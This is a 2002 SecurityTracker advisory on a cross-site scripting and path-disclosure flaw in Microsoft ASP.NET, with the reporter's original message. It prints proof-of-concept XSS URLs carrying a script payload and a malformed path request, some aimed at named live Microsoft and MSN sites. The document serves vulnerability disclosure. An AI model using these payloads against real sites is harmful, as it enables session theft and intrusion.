Microsoft ASP.NET Web Application Framework Allows Cross Site Scritping Attacks and Discloses Path Information to Remote Users
|
|
SecurityTracker Alert ID: 1003434 |
|
SecurityTracker URL: http://securitytracker.com/id/1003434
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Feb 5 2002
|
Impact:
Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network
|
Exploit Included: Yes
|
Version(s): Build:1.0.2914.16 (path disclosure)
|
Description:
A vulnerability was reported in Microsoft's ASP.NET web application framework. A remote user can conduct a cross-site scripting attack against sites using ASP.NET. A remote user can obtain installation path information from the server.
A remote user can reportedly create a web page or HTML-based e-mail message that includes a specially crafted URL that, when loaded by another (target) user, will cause javascript to be executed on the target user's computer. The code will appear to originate from a site running ASP.NET and will run in that site's security context. As a result, the javascript may access the target user's cookies and other information associated with the site running ASP.NET.
It is reported that the following type of URLs may trigger the vulnerability:
http://[targethost]/~/<script>alert(document.cookie)</script>.aspx?aspxerrorpath=null
http://[targethost]/<script>alert(document.cookie)</script>.aspx
On some versions of ASP.NET, a remote user can view the ASP.NET installation path by requesting a malformed URL. For example, the following request will trigger the vulnerability:
/a%5c.aspx
The vendor has reportedly been notified.
|
Impact:
A remote user may be able to access another user's cookies and other sensitive information associated with a site running ASP.NET. A remote user can view the installation path.
|
Solution:
No solution was available at the time of this entry.
|
Vendor URL: www.asp.net/ (Links to External Site)
|
Cause:
Exception handling error, Input validation error
|
Underlying OS:
Windows (2000), Windows (XP)
|
|
Message History:
This archive entry has one or more follow-up message(s) listed below.
|
Source Message Contents
|
Date: Mon, 4 Feb 2002 22:40:31 +0100
Subject: Microsoft .NET faults
|
Microsoft ASP.NET Cross Site Scripting and Full Path Disclosure vulnerability
This is based on Microsoft .NET.
Examples how it can be exploited:
Cross Site Scripting:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://ulogin.bcentral.com/~/<script>alert(document.cookie)</script>.aspx?aspxerrorpath=null
http://www.msn.com/~/<script>alert(document.cookie)</script>.aspx?aspxerrorpath=null
http://my.msn.com/~/<script>alert(document.cookie)</script>.aspx?aspxerrorpath=null
http://dotnet.microsoft.com/<script>alert(document.cookie)</script>.aspx
http://terraserver.microsoft.net/<script>alert(document.cookie)</script>.aspx
http://support.microsoft.com/~/<script>alert(document.cookie)</script>.aspx?aspxerrorpath=null
http://office.microsoft.com/~/<script>alert(document.cookie)</script>.aspx?aspxerrorpath=null
http://communities.microsoft.com/~/<script>alert(document.cookie)</script>.aspx
http://uddi.microsoft.com/~/<script>alert(document.cookie)</script>.aspx
This vulnerability exists on older .NET versions:
Full Path Disclosure vulnerability:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://terraserver.microsoft.com/a%5c.aspx
http://uddi.microsoft.com/a%5c.aspx
I've posted via Microsoft security subscribe website that there is a vulnerability and how to exploit on one of their site long times
ago (1/2 year ago), and haven't got any response of them.
-- Johannes Westerink
|
|
